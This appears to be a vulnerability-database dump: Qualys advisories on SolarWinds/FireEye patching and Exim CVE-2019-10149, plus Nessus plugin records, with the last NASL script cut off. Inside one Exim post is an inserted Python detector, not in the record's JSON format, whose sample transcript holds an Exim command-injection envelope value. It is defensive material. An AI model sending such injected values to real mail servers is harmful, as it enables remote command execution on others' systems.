Luckily, Microsoft patches have been available for a while.\n\n### List of 8 patchable security vulnerabilities to significantly reduce attack surface\n\n**CVE ID** | **Release Date** | **Name** | **CVSS** | **Qualys QID(s)** \n---|---|---|---|--- \nCVE-2020-1472 | 08/11/2020 | Microsoft Windows Netlogon Elevation of Privilege Vulnerability | 10 | 91668 \nCVE-2019-0604 | 02/12/2019 | Microsoft Office and Microsoft Office Services and Web Apps Security Update February 2019 (Microsoft SharePoint) | 9.8 | 110330 \nCVE-2019-0708 | 05/14/2019 | Microsoft Windows Remote Desktop Services Remote Code Execution Vulnerability (BlueKeep) | 9.8 | 91541, 91534 \nCVE-2014-1812 | 05/13/2014 | Microsoft Windows Group Policy Preferences Password Elevation of Privilege Vulnerability (KB2962486) | 9 | 91148, 90951 \nCVE-2020-0688 | 02/11/2020 | Microsoft Exchange Server Security Update for February 2020 | 8.8 | 50098 \nCVE-2016-0167 | 04/12/2016 | Microsoft Windows Graphics Component Security Update (MS16-039) | 7.8 | 91204 \nCVE-2017-11774 | 10/10/2017 | Microsoft Office and Microsoft Office Services and Web Apps Security Update October 2017 | 7.8 | 110306 \nCVE-2018-8581 | 11/13/2018 | Microsoft Exchange Server Elevation of Privilege Vulnerability | 7.4 | 53018 \n \n* See the [full list of 16 exploitable vulnerabilities and their patch links](<https://blog.qualys.com/vulnerabilities-research/2020/12/09/theft-of-cybersecurity-tools-fireeye-breach>).\n\n### Recommended action to mitigate the risk immediately\n\nBased on the sheer risk and scale of these vulnerabilities, it is imperative for organizations to quickly assess the state of these vulnerabilities and missing patches across all their assets impacted by SolarWinds Orion vulnerabilities, SUNBURST Trojan detections, or FireEye Red Team tools.\n\n * Immediately deploy applicable patches for all of the above vulnerabilities across the affected assets.\n * Disconnect SolarWinds Orion products, versions 2019.4 through 2020.2.1 HF1, from the network (or power them down) 
until the patch is applied.\n * Apply security hygiene controls for the impacted software and operating system to reduce the impact.\n * Search for the existence of the following files:\n * [SolarWinds.Orion.Core.BusinessLayer.dll] with an MD5 file hash of [b91ce2fa41029f6955bff20079468448]\n * [C:\\WINDOWS\\SysWOW64\\netsetupsvc.dll]\n\nand other Indicators of Compromise, and remove them, along with killing the parent processes that touched them.\n\n### Qualys brings free 60-day integrated Vulnerability Management, Detection and Response service to detect and patch these vulnerabilities\n\nTo help global organizations, Qualys is offering a free service for 60 days to rapidly address this risk. The service provides customers with:\n\n * Real-time, up-to-date inventory and automated organization of all assets, applications and services running across the hybrid-IT environment\n * Continuous view of all critical vulnerabilities and their prioritization based on real-time threat indicators and attack surface\n * Automatic correlation of applicable patches for identified vulnerabilities\n * Patch deployment via Qualys Cloud Agents with zero impact on VPN bandwidth\n * Security configuration hygiene assessment to apply as compensating controls to reduce vulnerability risk\n * Unified dashboards that consolidate all insights for management visualization via a single pane of glass\n\nIn addition to Qualys VMDR and Patch Management, organizations can also leverage additional capabilities like EDR and FIM to detect additional indicators of compromise, such as malicious files and hashes, and remove them from their environment.\n\n_Figure: VMDR prioritization screen with Solorigate SUNBURST RTI selected._\n\n_Figure: Qualys Unified Dashboard showing FireEye Red Team tools & Solorigate/SUNBURST risk._\n\n### Existing Qualys customers can immediately leverage their accounts to mitigate their exposure by taking the recommended actions\n\n * Inventory the compromised versions of SolarWinds and VMware applications as well as other 
actively running services and processes.\n * Detect all applicable vulnerabilities related to Solorigate/SUNBURST, FireEye tools and VMware applications, along with a prioritized list of appropriate patches to deploy.\n * Immediately deploy prioritized patches for the above critical vulnerabilities. Where a patch cannot be applied immediately, apply compensating controls to reduce the risk until patches can be applied.\n * Additionally, detect evidence of malicious files and IOCs related to SolarWinds applications and the compromised FireEye toolsets, and remove them.\n\n### Additional resources\n\n * [CISA Emergency Directive 21-01](<https://cyber.dhs.gov/ed/21-01/>)\n * [SolarWinds Security Advisory](<https://www.solarwinds.com/securityadvisory>)\n * [FireEye Red Team tools countermeasures](<https://github.com/fireeye/red_team_tool_countermeasure>)\n * [Qualys Research on FireEye Theft](<https://blog.qualys.com/vulnerabilities-research/2020/12/09/theft-of-cybersecurity-tools-fireeye-breach>)\n * [Qualys Research on SolarWinds](<https://blog.qualys.com/vulnerabilities-research/2020/12/14/fireeye-breach-leveraged-solarwinds-orion-software>)\n * [How to quickly deploy Qualys cloud agents for Inventory, Vulnerability and Patch Management](<https://blog.qualys.com/product-tech/2020/03/24/how-to-install-the-qualys-cloud-agent-for-remote-workforce>)", "cvss3": {}, "published": "2020-12-22T21:17:31", "type": "qualysblog", "title": "Qualys Security Advisory: SolarWinds / FireEye", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2020-12-22T21:17:31", "id": "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-15T00:29:31", "description": 
"Last week, Qualys issued a [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) for a vulnerability we discovered during a code review of Exim. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild. This blog will show you how to quickly identify assets that are impacted by this vulnerability.\n\n### The Vulnerability\n\nThis vulnerability exists in all versions of Exim from 4.87 through 4.91. Exploitation only requires a malicious email to be sent to a vulnerable server, and injected commands will typically run as root. There are multiple ways that Exim can be configured, and some of these will allow for faster exploitation, while others may require a week to fully exploit. For technical details on this vulnerability, please see our [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>).\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Several QIDs have been released for various Linux distros, as well as a generic remote Potential QID that will identify Exim hosts.\n\n### Finding Vulnerable Hosts\n\nThe fastest way to locate vulnerable hosts is through the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed. Simply click on the impacted assets number to see a list of hosts with this vulnerability. For customers without Threat Protection, you can manually search for the CVE in AssetView by using this search string:\n \n \n vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`\n\nThis will return a list of all impacted hosts. 
The results can also be grouped by Vulnerability, which will allow you to determine which distro patches are needed. To filter out the Potential detections (though these should be evaluated), you can modify the query like this:\n \n \n vulnerabilities:(vulnerability.cveIds:`CVE-2019-10149` and typeDetected:`Confirmed`)\n\n### Remediation\n\nTo remediate this vulnerability, Exim must be updated to version 4.92. Check your Linux OS vendor for updated packages.", "cvss3": {}, "published": "2019-06-14T22:27:14", "type": "qualysblog", "title": "Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-14T22:27:14", "id": "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T19:50:44", "description": "The Exim MTA vulnerability, initially [reported by Qualys](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) in May 2019, is currently being exploited in the wild. 
Recently, the US National Security Agency (NSA) [announced](<https://www.us-cert.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>) that Sandworm actors (a Russian state-sponsored hacking group) have been actively exploiting the Exim Mail Transfer Agent vulnerability.\n\nQualys released a blog post last year describing how to identify assets that are impacted by this vulnerability in your environment: [Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)](<https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149>)\n\n### Sandworm Attacks\n\nThe Exim MTA vulnerability can be exploited by sending a malicious email to the server, allowing an attacker to run commands on the server remotely. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild.\n\nThe NSA reported that Sandworm actors have been exploiting this vulnerability since at least August 2019. The actors exploited victims running Exim on their public-facing MTAs by sending a command in the \"MAIL FROM\" field of an SMTP (Simple Mail Transfer Protocol) message. The exploit then executed a shell script that performed the following actions on the victim's system:\n\n * Add privileged users\n * Disable network security settings\n * Update SSH configurations to enable remote access\n * Execute an additional script to enable follow-on exploitation\n\nUnpatched systems are at high risk, and immediate action should be taken to remediate this vulnerability.\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Qualys released several QIDs for various Linux distros, as well as a generic remote Potential QID (50092) that will identify Exim hosts. 
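As an added example (this is not Qualys' code and is not part of the original post), the Python below implements two lightweight checks a defender can run alongside the QIDs: a banner-based version classification for the 4.87 through 4.91 range named above, and a scan of SMTP envelope commands for Exim string-expansion syntax. The `${run{...}}` construct is Exim's documented expansion item for running a command; the post does not name it, and the greetings and the SMTP transcript in the block are constructed sample data, not captured traffic.

```python
"""Two lightweight checks for CVE-2019-10149 (added example, not Qualys' code).

1. Classify an Exim SMTP greeting by version: 4.87 through 4.91 is the
   affected range named in the post; 4.92 carries the fix.
2. Flag SMTP envelope addresses that contain Exim string-expansion syntax.
   The exploit smuggles a "${run{...}}" expansion item through the envelope;
   a legitimate mailbox address never contains "${".

All greetings and the SMTP transcript below are constructed sample data.
"""
import re
from typing import List, Optional, Tuple

AFFECTED_MIN = (4, 87)  # first affected release named in the post
AFFECTED_MAX = (4, 91)  # last affected release; 4.92 is fixed

_BANNER_RE = re.compile(r"\bExim\s+(\d+)\.(\d+)")
_ENVELOPE_RE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<(.*)>", re.IGNORECASE)


def exim_version_from_banner(banner: str) -> Optional[Tuple[int, int]]:
    """Return (major, minor) from a 220 greeting, or None if it is not Exim."""
    m = _BANNER_RE.search(banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def banner_is_vulnerable(banner: str) -> Optional[bool]:
    """True/False for an Exim greeting; None when no Exim version can be read."""
    version = exim_version_from_banner(banner)
    if version is None:
        return None
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def envelope_has_expansion(address: str) -> bool:
    """Exim expands '${...}' while processing an address; RFC 5321 mailboxes never contain it."""
    return "${" in address


def suspicious_envelope_commands(transcript: str) -> List[str]:
    """Return the MAIL FROM / RCPT TO lines of an SMTP transcript that carry expansion syntax."""
    hits = []
    for raw in transcript.splitlines():
        line = raw.strip()
        m = _ENVELOPE_RE.match(line)
        if m and envelope_has_expansion(m.group(2)):
            hits.append(line)
    return hits


# Constructed sample greetings, mapped to the expected classification.
SAMPLE_BANNERS = {
    "220 mx1.example.test ESMTP Exim 4.89 Mon, 10 Jun 2019 12:00:00 +0000": True,
    "220 mx2.example.test ESMTP Exim 4.92 Mon, 10 Jun 2019 12:00:00 +0000": False,
    "220 mx3.example.test ESMTP Postfix": None,
}

# Constructed SMTP transcript: one envelope sender carries an expansion item.
SAMPLE_TRANSCRIPT = """\
EHLO client.example.test
MAIL FROM:<${run{/bin/sh -c "id"}}@localhost>
RCPT TO:<postmaster@localhost>
MAIL FROM:<alice@example.test>
RCPT TO:<bob@example.test>
"""

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(banner_is_vulnerable(banner), banner)
    for hit in suspicious_envelope_commands(SAMPLE_TRANSCRIPT):
        print("suspicious envelope command:", hit)
```

The banner check is a "Potential"-grade finding, for the same reason the post prefers the Cloud Agent or authenticated scanning: distribution packages backport the fix without changing the upstream version in the greeting, so a host announcing Exim 4.89 may already be patched. Confirm against the installed package version before treating the host as exposed; the envelope check, by contrast, is useful on any MTA log or capture regardless of version.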
You can search for these QIDs in the VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`_\n\nIn addition, [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) customers can effectively prioritize this vulnerability, as Qualys QID 50092 carries the following RTIs (Real-Time Threat Indicators):\n\n * Active Attacks\n * Public Exploit\n * Predicted High Risk\n * Wormable\n\nVMDR customers can also stay on top of these threats proactively via the 'live feed' provided for threat prioritization. With the live feed updated for all emerging high and medium risks, you can clearly see which hosts are impacted by each threat.\n\n### Remediation\n\nCustomers are advised to update Exim immediately by installing version 4.92 or newer to remediate this vulnerability. System administrators can update their Linux distributions using the package manager or by downloading the latest version from <https://www.exim.org/mirrors.html>.\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get the [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>).", "cvss3": {}, "published": "2020-05-29T22:42:14", "type": "qualysblog", "title": "NSA Announces Sandworm Actors Exploiting Exim MTA Vulnerability (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-29T22:42:14", "id": "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-16T15:43:41", "description": "The remote Citrix SD-WAN WANOP device is version 10.2.x prior to 10.2.7, 11.0.x prior to 11.0.3d, 11.1.x prior to 11.1.1a. It is, therefore, affected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix SD-WAN WANOP devices. 
An unauthenticated, remote attacker with access to the NSIP/management interface can exploit this issue to bypass authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote attacker with access to the NSIP/management interface can exploit this issue to create a malicious file which, if executed by a victim on the management network, could allow the attacker arbitrary code execution in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote attacker can exploit this issue by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session. (CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix SD-WAN WANOP devices are also affected by several additional vulnerabilities including configuration-dependent privilege escalations, information disclosures, and a denial of service (DoS) vulnerability.\nPlease refer to advisory CTX276688 for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-09-02T00:00:00", "type": "nessus", "title": "Citrix SD-WAN WANOP 10.2.x Multiple Vulnerabilities (CTX276688)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8198"], "modified": "2022-05-12T00:00:00", "cpe": ["cpe:/a:citrix:sd-wan"], "id": "CITRIX_SDWAN_WANOP_MULTIPLE_VULNS.NASL", "href": "https://www.tenable.com/plugins/nessus/140192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140192);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n 
script_cve_id(\n \"CVE-2020-8191\",\n \"CVE-2020-8193\",\n \"CVE-2020-8194\",\n \"CVE-2020-8195\",\n \"CVE-2020-8196\",\n \"CVE-2020-8198\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0286-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Citrix SD-WAN WANOP 10.2.x Multiple Vulnerabilities (CTX276688)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix SD-WAN WANOP device is version 10.2.x prior to 10.2.7, 11.0.x prior to 11.0.3d, 11.1.x prior to\n11.1.1a. It is, therefore, affected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote\n attacker with access to the NSIP/management interface can exploit this issue to bypass authorization. \n (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote attacker\n with access to the NSIP/management interface can exploit this issue to create a malicious file which, if\n executed by a victim on the management network, could allow the attacker arbitrary code execution in the\n context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote\n attacker can exploit this issue by convincing a user to click a specially crafted URL, to execute\n arbitrary script code in a user's browser session. 
(CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix SD-WAN WANOP devices are also affected by several additional vulnerabilities including\nconfiguration-dependent privilege escalations, information disclosures, and a denial of service (DoS) vulnerability.\nPlease refer to advisory CTX276688 for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX276688\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Citrix SD-WAN WAN-OS to version 10.2.7, 11.0.3d 11.1.1a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8193\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-8195\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:citrix:sd-wan\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_sdwan_detect.nbin\");\n script_require_keys(\"installed_sw/Citrix SD-WAN\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_name = 'Citrix SD-WAN';\napp_info = vcf::get_app_info(app:app_name);\n\nedition = app_info['Edition'];\nmodel = app_info['Model'];\npattern = \"WAN-?OP\";\n\nif (!preg(pattern:pattern, string:app_info['Edition']) && !preg(pattern:pattern, string:app_info['Model']))\n audit(AUDIT_HOST_NOT, 'affected');\n\nconstraints = [\n { 'min_version' : '10.2.0', 'fixed_version' : '10.2.7' },\n { 'min_version' : '11.0.0', 'fixed_version' : '11.0.3d' },\n { 'min_version' : '11.1.0', 'fixed_version' : '11.1.1a' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-13T16:16:35", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.2.x < 3.2.8 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98658", "href": "https://www.tenable.com/plugins/was/98658", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:36", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98660", "href": "https://www.tenable.com/plugins/was/98660", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:34", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98656", "href": "https://www.tenable.com/plugins/was/98656", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:34", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.1.x < 3.1.6 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98659", "href": "https://www.tenable.com/plugins/was/98659", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:35", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.3.x < 3.3.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98657", "href": "https://www.tenable.com/plugins/was/98657", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:21:16", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-22T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-22T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "701078.PRM", "href": "https://www.tenable.com/plugins/nnm/701078", "sourceData": "Binary data 701078.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:37:47", "description": "The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_CVE-2019-11580.NASL", "href": "https://www.tenable.com/plugins/nessus/138553", "sourceData": "#TRUSTED 
8f52b3443adbdc031337caca6a3f34431f1b341d3c8301cf3e855f7f3363fbf0bf9b7f0d58e3328a37d6dece24c4c9dcc73ccf78c27c66d987dbdaf6186643afcfe8dbbc2a0517f9fa9531f0240b05a4751809b449e7dc3066482ae086e25a8f94806188dd42bd8ab78dda28cd63fada8492a35233a18a0929ee865082646260d7509392ad29c59b136b7ce199b50c9b7bcfd6458681e82364f52769b833c14183c063bfcf2ba969406b456addd06a58c41686d4c22ae421eea1298aa494c5dfa1ed98dd838ec86de8cc085782289be07f9c3eca1aa874f02206fe704079a7488502da717dcb6223d5b571ad82a45452823e72986ed6a0581d646c30d1d53de860ee91ddd19597a98583110f32b85345b2c36163508b0ccee993f8919c893d2d9e79690bed760d1572886b9e870ec31650c8cbfc554058b352c177810529591eb45f6d9a9d0c1ae0d00d20abe798b9809d0ca28b76a78c63a1bb316535270ee0d30a8efb58ee8a33560d87ee2120ade6e00838d2bead85bb289646fa07933c19f1ef493bb3eb0002b72f80b1a0b67aef6bd2be04668761d49be8c98d3f8fbfff92b0b56f028087c9e4d08fedad1efa53ca16080353f0be83d9346be201249ffeb2db1d808bc47055cce92b6574b049eeda084c90cf42d51403e4c9491d22eb322b7339937ad22dce432806931ddb73d6073e66e35ed7578ed43065921e1ca2bb\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138553);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_bugtraq_id(108637);\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n 